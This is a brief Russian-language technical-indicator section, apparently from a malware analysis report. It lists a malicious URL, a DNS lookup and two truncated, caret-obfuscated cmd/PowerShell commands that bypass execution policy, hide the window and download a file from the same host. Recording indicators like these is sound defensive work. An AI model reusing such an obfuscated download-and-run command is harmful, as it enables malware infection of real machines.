Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOw^ErS^hELL^.e^xE^ -e^XEC^Utio^nPOLiCY^ ^BY^P^ASS ^-NOPRO^Fil^e^ -^wI^ND^Owst^Yle^ ^hiD^DEn ^(^NE^w-o^B^J^E^ct ^S^ys^t^em.NEt^.web^CL^IenT^).dO^Wnl^oa^dF^IlE^('http://www.doo...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "pOw^ErS^hELL^.e^xE^ -e^XEC^Utio^nPOLiCY^ ^BY^P^ASS ^-NOPRO^Fil^e^ -^wI^ND^Owst^Yle^ ^hiD^DEn ^(^NE^w-o^B^J^E^ct ^S^ys^t^em.NEt^.web^CL^IenT^).dO^Wnl^oa^dF^IlE^('http://www.doo...' (со скрытым окном)